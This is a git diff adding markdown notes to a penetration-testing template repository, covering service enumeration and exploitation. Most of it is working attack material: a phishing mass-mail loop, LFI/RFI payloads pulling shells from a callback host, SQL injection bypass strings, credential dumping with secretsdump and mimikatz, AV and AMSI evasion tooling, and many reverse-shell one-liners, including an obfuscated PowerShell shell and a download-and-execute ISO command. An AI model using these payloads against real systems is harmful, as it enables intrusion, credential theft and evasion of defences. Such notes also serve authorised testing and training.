+-rw-r--r-- 1 root root  7719 Oct 12 09:29 smtp-vuln-cve2011-1720.nse
+-rw-r--r-- 1 root root  7603 Oct 12 09:29 smtp-vuln-cve2011-1764.nse
+$ nmap x.x.x.x -p 25 -sV --script=exampleScript1.nse,exampleScript2.nse
+```
+
+## Metasploit: 
+
+```
+msf > use auxiliary/scanner/smtp/smtp_enum 
+msf auxiliary(smtp_enum) set RHOSTS <IP address/target>
+msf auxiliary(smtp_enum) > set rport 25
+msf auxiliary(smtp_enum) set USER_FILE <address of file>
+msf auxiliary(smtp_enum) run
+```
+
+## smtp-user-enum
+ - Install (Kali Linux): 
+ ```
+sudo apt install smtp-user-enum
+```
+
+```
+$ smtp-user-enum -M VRFY -U users.txt -t 172.21.0.0
+$ smtp-user-enum -M EXPN -u admin1 -t 172.21.0.0
+$ smtp-user-enum -M RCPT -U users.txt -T server-ips.txt
+$ smtp-user-enum -M EXPN -D example.com -U users.txt -t 172.21.0.0
+```
+
+## Mass email
+
+If you've collected emails from the target domain, you can use something like the following to send out super simple phishing emails. (Saw this on a HTB machine, keep expectations of success low in the real world)
+```
+$ while read mail; do swaks –to $mail –from IT@targetdomain.com –header "Subject: Credentials / Errors" –body "goto http://attackerIP/" –server x.x.x.x; done < mails.txt
+```
+
+# POP3 Enumeration
+
+## Nmap Enumeration
+
+```
+$ ls -lh /usr/share/nmap/scripts/ | grep pop
+-rw-r--r-- 1 root root  3953 Oct 12 09:29 pop3-brute.nse
+-rw-r--r-- 1 root root  1397 Oct 12 09:29 pop3-capabilities.nse
+-rw-r--r-- 1 root root  4941 Oct 12 09:29 pop3-ntlm-info.nse
+$ nmap x.x.x.x -p 110 -sV --script=exampleScript1.nse,exampleScript2.nse
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Directory Fuzzing.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Directory Fuzzing.md
new file mode 100644
index 0000000..6dfda13
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Directory Fuzzing.md	
@@ -0,0 +1,37 @@
+# Web Tools for Directory Scanning: 
+
+Dirb: 
+
+- dirb <domain>
+- dirb <domain> <wordlist>
+
+Gobuster: 
+
+- gobuster dir -u <url> -w /usr/share/wordlists/<Wordlist file>
+- gobuster dir -u <url> -w /usr/share/wordlists/<Wordlist file> -a Firefox (Custom Agent)
+- gobuster dir -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html
+- gobuster dir -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster dir -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster dir -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
+- gobuster dir -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" -o output.txt
+- gobuster dir -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'
+
+Wfuzz:
+
+- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
+- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
+- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ"  --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests)
+
+- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies)
+
+Dirsearch: 
+
+- dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php
+
+FFuF:
+
+- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0
+- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -b "COOKIE VALUE; security=low" -u http://172.21.0.0
+- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -fc 403, 302, 200
+- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -H "Host: 172.21.0.0" -u http://172.21.0.0
+- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -timeout 5
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Enumerating Web Services.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Enumerating Web Services.md
new file mode 100644
index 0000000..0abaebd
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Enumerating Web Services.md	
@@ -0,0 +1,89 @@
+
+# Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!
+
+## Step 2: 
+
+## Common Wordlists to use for Web App Scanning: 
+
+Common Wordlists to use for Web Directory Scanning: 
+- /usr/share/wordlists/dirb/common.txt
+- /usr/share/wordlists/dirbuster/*.txt
+- /usr/share/wordlists/wfuzz/general/*.txt
+- /usr/share/seclists/Discovery/Web-Content/
+- Assetnote Wordlists: https://wordlists.assetnote.io/
+- Jhaddix Content Discovery: https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10
+
+Common Wordlists to use for User Enumeration Scanning: 
+- /usr/share/seclists/Usernames
+- /usr/share/wordlists/dirbuster/apache-user-enum-2.0
+
+## Web App Scanners
+
+
+Wpscan(WordPress Scannner):
+
+- wpscan --url <domain>
+- wpscan --url <domain> --enumerate ap at (All Plugins, All Themes)
+- wpscan --url <domain> --enumerate u (Usernames)
+- wpscan --url <domain> --enumerate v
+
+
+
+Other Tools: 
+- Burp Suite
+- OWASP Zap
+- Cadaver
+- SQLMap
+- Joomscan
+- Feroxbuster
+
+## Testing for LFI: 
+
+https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf
+
+Examples: 
+
+http://example.com/index.php?page=etc/passwd
+http://example.com/index.php?page=etc/passwd%00
+http://example.com/index.php?page=../../etc/passwd
+http://example.com/index.php?page=%252e%252e%252f
+http://example.com/index.php?page=....//....//etc/passwd
+
+Interesting Files:
+
+Linux:
+
+```
+/etc/passwd
+/etc/shadow
+/etc/issue
+/etc/group
+/etc/hostname
+/etc/ssh/ssh_config
+/etc/ssh/sshd_config
+/root/.ssh/id_rsa
+/root/.ssh/authorized_keys
+/home/user/.ssh/authorized_keys
+/home/user/.ssh/id_rsa
+```
+
+Windows:
+```
+/boot.ini
+/autoexec.bat
+/windows/system32/drivers/etc/hosts
+/windows/repair/SAM
+```
+
+
+## Testing for RFI: 
+
+http://example.com/index.php?page=http://callback.com/shell.txt
+http://example.com/index.php?page=http://callback.com/shell.txt%00
+http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt
+
+## Resources
+
+- Turning LFI to RFI: 
+https://l.avala.mp/?p=241
+Backup: https://web.archive.org/web/20210612222732/https://l.avala.mp/?p=241
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/SQL Injection.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/SQL Injection.md
new file mode 100644
index 0000000..cc7d1db
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/SQL Injection.md	
@@ -0,0 +1,25 @@
+Testing for Bypasses: 
+
+' or 1=1 LIMIT 1 --
+' or 1=1 LIMIT 1 -- -
+' or 1=1 LIMIT 1#
+'or 1#
+' or 1=1 --
+' or 1=1 -- -
+
+# SQLMAP
+
+## sqlmap crawl  
+sqlmap -u http://172.21.0.0 --crawl=1
+
+## sqlmap dump database  
+sqlmap -u http://172.21.0.0 --dbms=mysql --dump
+
+## sqlmap shell  
+sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell
+
+# SQLI
+
+Testing for a row: 
+
+- http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/05. Network Shares (SMB, SAMBA, NFS)/SMB Enumeration.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/05. Network Shares (SMB, SAMBA, NFS)/SMB Enumeration.md
new file mode 100644
index 0000000..6d05e35
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/05. Network Shares (SMB, SAMBA, NFS)/SMB Enumeration.md	
@@ -0,0 +1,84 @@
+# Nmap Enumeration: 
+```
+/usr/share/nmap/scripts/smb-brute.nse
+/usr/share/nmap/scripts/smb-enum-domains.nse
+/usr/share/nmap/scripts/smb-enum-groups.nse
+/usr/share/nmap/scripts/smb-enum-processes.nse
+/usr/share/nmap/scripts/smb-enum-services.nse
+/usr/share/nmap/scripts/smb-enum-sessions.nse
+/usr/share/nmap/scripts/smb-enum-shares.nse
+/usr/share/nmap/scripts/smb-enum-users.nse
+/usr/share/nmap/scripts/smb-flood.nse
+/usr/share/nmap/scripts/smb-ls.nse
+/usr/share/nmap/scripts/smb-mbenum.nse
+/usr/share/nmap/scripts/smb-os-discovery.nse
+/usr/share/nmap/scripts/smb-print-text.nse
+/usr/share/nmap/scripts/smb-protocols.nse
+/usr/share/nmap/scripts/smb-psexec.nse
+/usr/share/nmap/scripts/smb-security-mode.nse
+/usr/share/nmap/scripts/smb-server-stats.nse
+/usr/share/nmap/scripts/smb-system-info.nse
+```
+
+- nmap --script smb-* -p 139,445, 172.21.0.0
+- nmap --script smb-enum-* -p 139,445, 172.21.0.0
+
+
+
+# Enum4linux:
+
+- Enum4linux -a 172.21.0.0
+- Enum4linux -U 172.21.0.0
+- Enum4linux -r 172.21.0.0
+- Enum4linux -S 172.21.0.0
+
+# Enum4linux-Ng
+https://github.com/cddmp/enum4linux-ng
+- Enum4linux 172.21.0.0 -A
+- Enum4linux-ng 172.21.0.0 -A -C
+- Enum4linux 172.21.0.0 -S
+- Enum4linux 172.21.0.0 -K ticket.kirbi -A
+
+# SMBmap:
+
+- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password]
+- smbmap -H 172.21.0.0 -d [domain] -u "" -p ""
+
+# SMBClient: 
+
+- smbclient -L 172.21.0.0
+- smbclient //172.21.0.0/tmp
+
+Recursively list a directory: 
+```
+$ smbclient \\\\x.x.x.x\\Folder
+smb: \> recurse on             
+smb: \> ls
+```
+
+# Impacket: 
+
+## Smbclient:
+- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0
+- impacket-smbclient username@172.21.0.0
+## Samdump:
+- Impackert-sam SMB 172.21.0.0
+
+# RPCclient: 
+
+- rpcclient -U "" -N 172.21.0.0 enumdomusers
+
+# CrackMapExec: 
+
+- crackmapexec smb -L 
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --share
+- crackmapexec smb --gen-relay-list smb-targets.txt 172.21.0.0/24
+- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz
+- crackmapexec smb x.x.x.x --pass-pol -u '' -p ''
+
+# Polenum:
+- polenum -u '' -p '' -d x.x.x.x
+
+ 
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/3. Active Directory (AD)/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/3. Active Directory (AD)/General Notes.md
new file mode 100644
index 0000000..83f9631
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/3. Active Directory (AD)/General Notes.md	
@@ -0,0 +1,37 @@
+# Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 
+
+
+# Anonymous Credential LDAP Dumping: 
+
+- ldapsearch -LLL -x -H ldap://<domain fqdn> -b ‘’ -s base ‘(objectclass=*)’
+
+Impacket GetADUsers.py (Must have valid credentials)
+
+- GetADUsers.py -all <domain\User> -dc-ip <DC_IP>
+
+Impacket lookupsid.py:
+
+- /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0
+
+Impacket Secretdump:
+
+python3 secretdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakin
+
+Windapsearch:
+
+https://github.com/ropnop/windapsearch 
+
+- python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
+
+Crackmapexec:
+
+- cme ldap <IP> -u "" -p "" -d <DOMAIN>
+
+- cme ldap <IP> -u "Guest" -p "" -d <DOMAIN>
+
+## References: 
+
+- PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
+
+- Attacking Active Directory: 0 to 0.9:
+https://zer1t0.gitlab.io/posts/attacking_ad/
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/4. SNMP/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/4. SNMP/General Notes.md
new file mode 100644
index 0000000..2e1767e
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/4. SNMP/General Notes.md	
@@ -0,0 +1,55 @@
+## SNMP Walk: 
+
+
+- snmpwalk -c public -v1 ipaddress 1
+- snmpwalk -c private -v1 ipaddress 1
+- snmpwalk -c manager -v1 ipaddress 1
+
+
+## Nmap Enumeration: 
+
+- nmap 172.21.0.0 -Pn -sU -p 161 --script=
+
+/usr/share/nmap/scripts/snmp-brute.nse
+/usr/share/nmap/scripts/snmp-hh3c-logins.nse
+/usr/share/nmap/scripts/snmp-info.nse
+/usr/share/nmap/scripts/snmp-interfaces.nse
+/usr/share/nmap/scripts/snmp-ios-config.nse
+/usr/share/nmap/scripts/snmp-netstat.nse
+/usr/share/nmap/scripts/snmp-processes.nse
+/usr/share/nmap/scripts/snmp-sysdescr.nse
+/usr/share/nmap/scripts/snmp-win32-services.nse
+/usr/share/nmap/scripts/snmp-win32-shares.nse
+/usr/share/nmap/scripts/snmp-win32-software.nse
+/usr/share/nmap/scripts/snmp-win32-users.nse
+
+## Metasploit auxilary modules: 
+
+ auxiliary/scanner/misc/oki_scanner                                    
+ auxiliary/scanner/snmp/aix_version                                   
+ auxiliary/scanner/snmp/arris_dg950                                   
+ auxiliary/scanner/snmp/brocade_enumhash                               
+ auxiliary/scanner/snmp/cisco_config_tftp                               
+ auxiliary/scanner/snmp/cisco_upload_file                              
+ auxiliary/scanner/snmp/cnpilot_r_snmp_loot                             
+ auxiliary/scanner/snmp/epmp1000_snmp_loot                             
+ auxiliary/scanner/snmp/netopia_enum                                    
+ auxiliary/scanner/snmp/sbg6580_enum                                 
+ auxiliary/scanner/snmp/snmp_enum                                 
+ auxiliary/scanner/snmp/snmp_enum_hp_laserjet                           
+ auxiliary/scanner/snmp/snmp_enumshares                                
+ auxiliary/scanner/snmp/snmp_enumusers                                 
+ auxiliary/scanner/snmp/snmp_login                                     
+
+
+Onesixtyone: 
+
+- onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X
+
+Snmp-check
+
+- snmp-check 172.21.0.0 -c public
+
+Impacket: 
+
+- python3 samdump.py SNMP 172.21.0.0
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/8. Other Services/LDAP Enumeration (Port 389).md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/8. Other Services/LDAP Enumeration (Port 389).md
new file mode 100644
index 0000000..4811446
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/8. Other Services/LDAP Enumeration (Port 389).md	
@@ -0,0 +1,80 @@
+# LDAP Enumeration Tools
+
+**Note:** Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 
+
+### ldapsearch
+
+Simple authentication check:
+```
+$ ldapsearch -h <target_IP> -x
+```
+Anonymous Credential LDAP Dumping: 
+```
+$ ldapsearch -LLL -x -H ldap://<domain fqdn> -b ‘’ -s base ‘(objectclass=*)’
+```
+Getting DN:
+```
+$ ldapsearch -h <target_IP> -x -s base namingcontexts
+```
+- `-s` is scope: one of base, one, sub or children (search scope)
+
+If you get DN from above command, use it in a base search (-b basedn: base dn for search)
+```
+$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>"
+```
+You can also query the LDAP server:
+```
+$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>" <query>
+```
+i.e. user enumeration:
+```
+$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>" '(objectClass=Person)'
+```
+This will give a lot of useful information, i.e. when password was last reset, username of the account (sAMAccountName).
+
+Filtering your query:
+```
+$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>" '(objectClass=Person)' <filters>
+```
+I.e. to query for only account names:
+```
+$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>" '(objectClass=Person)' sAMAccountName
+```
+Or use grep to get a list of account names for password spraying:
+```
+$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>" '(objectClass=Person)' sAMAccountName | grep sAMAccountName | awk '{print $2}' > userlist.ldap
+```
+
+### Impacket
+
+Using that username list generated from `ldapsearch`, we can use Impacket's `GetNPUsers.py` to see if we can get a user's TGT:
+```
+$ python3 GetNPUsers.py -dc-ip <target_IP> -request domain.local/ -userfile userlist.ldap -format john
+```
+or
+```
+$ GetADUsers.py -all <domain\User> -dc-ip <DC_IP>
+```
+
+You can simply change the -format flag to hashcat if you want to use hashcat. 
+
+Or try with no password:
+```
+$ python3 GetNPUsers.py <domain/user> -request -no-pass -dc-ip <IP>
+```
+
+Impacket `lookupsid.py`:
+```
+$ /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@x.x.x.x
+```
+
+### Windapsearch
+
+Source: https://github.com/ropnop/windapsearch 
+```
+$ python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
+```
+
+#### References: 
+
+- [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise)
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/4. Enumerating Targets/Target _1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/4. Enumerating Targets/Target _1.md
new file mode 100644
index 0000000..4159f8f
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/4. Enumerating Targets/Target _1.md	
@@ -0,0 +1 @@
+# This is a placeholder to contain all notes regarding the enumeration phase for each target you assess.
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypass Windows Amsi.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypass Windows Amsi.md
new file mode 100644
index 0000000..741d9b1
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypass Windows Amsi.md	
@@ -0,0 +1,15 @@
+## Testing for Amsi Bypass:
+
+- https://github.com/rasta-mouse/AmsiScanBufferBypass
+
+## Amsi-Bypass-Powershell
+
+- https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
+
+## Resources:
+
+- https://blog.f-secure.com/hunting-for-amsi-bypasses/
+- https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+- https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
+- https://slaeryan.github.io/posts/falcon-zero-alpha.html
+- https://www.hackingarticles.in/a-detailed-guide-on-amsi-bypass/
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypassing AV.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypassing AV.md
new file mode 100644
index 0000000..bfa78b8
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypassing AV.md	
@@ -0,0 +1,61 @@
+## Veil Framework:
+
+Install on Kali: 
+- apt install veil
+- /usr/share/veil/config/setup.sh --force --silent
+
+Reference: https://github.com/Veil-Framework/Veil
+
+## Shellter
+
+Source: https://www.shellterproject.com/download/
+
+- apt install shellter
+
+
+## Sharpshooter
+
+Javascript Payload Stageless: 
+- SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
+
+Stageless HTA Payload: 
+
+- SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
+
+Staged VBS:
+
+- SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
+
+Reference: https://github.com/mdsecactivebreach/SharpShooter
+
+## Donut: 
+
+Source: https://github.com/TheWover/donut
+
+## Vulcan
+
+Source: https://github.com/praetorian-code/vulcan
+
+
+## Scarecrow
+
+Source: https://github.com/optiv/ScareCrow
+
+In Kali: 
+
+sudo apt install golang
+
+go get github.com/fatih/color
+go get github.com/yeka/zip
+go get github.com/josephspurrier/goversioninfo
+
+go build ScareCrow.go
+
+./ScareCrow
+
+# Resources: 
+
+- https://book.hacktricks.xyz/windows-hardening/av-bypass
+- https://www.ired.team/offensive-security/defense-evasion/av-bypass-with-metasploit-templates
+-
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/General Notes.md
new file mode 100644
index 0000000..5c3f342
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/General Notes.md	
@@ -0,0 +1,128 @@
+## Pre-requisites for runninging exploits
+
+- Check the version of the operating system.
+- Check the software version.
+- Check if there is exploit for it (Searchsploit, ExploitDB, Google, etc).
+- If you have an exploit, is there a Metasploit Module for it?
+
+
+## Default Credentials
+
+- https://cirt.net/passwords
+- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
+
+## Reverse Shells
+
+## Online Reverse Shell Generators:
+- https://www.revshells.com/
+- https://shellgenerator.github.io/
+
+## Hosting Revshells Locally: 
+1. git clone https://github.com/0dayCTF/reverse-shell-generator
+2. docker build -t reverse_shell_generator .
+3. docker run -d -p 80:80 reverse_shell_generator
+
+## Other Reverse Shell:
+
+Bash: 
+
+- bash -i >& /dev/tcp/IP ADDRESS/8080 0>&1
+
+Perl:
+
+```
+perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+```
+
+Python: 
+
+- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+IPv6: 
+
+- python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 
+
+Ruby:
+
+- ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
+- ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+
+
+PHP:
+
+Pentest Monkey Reverse Shell for PHP:
+In Kali: 
+
+/usr/share/webshells/php/php-reverse-shell.php
+
+Link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
+
+- php -r '$sock=fsockopen("IP ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
+
+Windows Powershell Oneliner: 
+
+Note: To change the IP Address replace the number values in Check.for.Callback.Connection. To change the port pick your own numeric values to equal the number you want your shell to callback to you. 
+
+```
+# Offsec-callback-v2
+$ezYSZf = & ((Get-Command "New-ScheduledJobOption").name[0,1,2,3,14,15,13,1,5,18] -join '') ([string]::join('', ( (83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,46,84,67,80,67,108,105,101,110,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})("Check.for.Callback.Connection".Replace("Check",127).Replace("For",0+255-255).Replace("Callback", 0+234-234).Replace("Connection",0+0+0+1),(443*2-443));
+$VXm = $ezYSZf.GetStream();
+# checkin to target
+[byte[]]$0bLXRjHKPvWQUhq = (10023-10023)..(13107*5)|<##>%{$_}<##>|%{0};
+while(($i = $VXm.Read($0bLXRjHKPvWQUhq, 0, $0bLXRjHKPvWQUhq.Length)) -ne 0)
+{;
+$Tc9dYRLI5 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($0bLXRjHKPvWQUhq,0, $i);
+$sendback = (iex $Tc9dYRLI5 2>&1 |<##>%{$_}<##>| Out-String );
+# AND
+$YzlnHIRT = $sendback + $(([string]::join('', ( (80,83,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})) + (pwd).Path + $(([string]::join('', ( (62,62,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_}));
+$sdfghjklASDA222 = ([text.encoding]::ASCII).GetBytes($YzlnHIRT);
+$VXm.Write($sdfghjklASDA222,0,$sdfghjklASDA222.Length);$VXm.Flush()
+};
+Start-Sleep -Seconds 5
+# checkout of target
+$ezYSZf.Close()
+```
+
+Powershell ISO Oneliner:
+```
+powershell -c "(New-Object System.Net.WebClient).DownloadFile('https://172.21.1.0/windows.iso', 'C:\Windows\Tasks\windows.iso'); $MountedImage = Mount-DiskImage -ImagePath 'C:\Windows\Tasks\windows.iso' -PassThru; Start-Process -FilePath ($MountedImage | Get-Volume).DriveLetter + ':\msupdate.exe'; dismount-DiskImage -ImagePath $MountedImage.ImagePath"
+```
+
+Linux Powershell Oneliner:
+
+```
+$ezYSZf = & (("New-ScheduledJobOption")[0,1,2,3,14,15,13,1,5,18] -join '') ([string]::join('', ( (83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,46,84,67,80,67,108,105,101,110,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})("Stay.Off.Ronins.Lawn".Replace("Stay",127).Replace("Off",0+255-255).Replace("Ronins", 0+1-1).Replace("Lawn",0+0+0+1),(443*2-443));
+$VXm = $ezYSZf.GetStream();
+[byte[]]$0bLXRjHKPvWQUhq = (10023-10023)..(13107*5)|<##>%{$_}<##>|%{0};
+while(($i = $VXm.Read($0bLXRjHKPvWQUhq, 0, $0bLXRjHKPvWQUhq.Length)) -ne 0)
+{;
+$Tc9dYRLI5 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($0bLXRjHKPvWQUhq,0, $i);
+$sendback = (iex $Tc9dYRLI5 2>&1 |<##>%{$_}<##>| Out-String );
+$YzlnHIRT = $sendback + $(([string]::join('', ( (80,83,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})) + (pwd).Path + $(([string]::join('', ( (62,62,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_}));
+$sdfghjklASDA222 = ([text.encoding]::ASCII).GetBytes($YzlnHIRT);
+$VXm.Write($sdfghjklASDA222,0,$sdfghjklASDA222.Length);$VXm.Flush()
+};
+$ezYSZf.Close()
+```
+
+Golang: 
+
+- echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
+
+AWK: 
+
+- awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
+
+
+Other Reverse Shell: 
+https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
+
+
+## Other Resources 
+
+- Amsi-Bypass-Powershell: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 
+
+
+
+
+
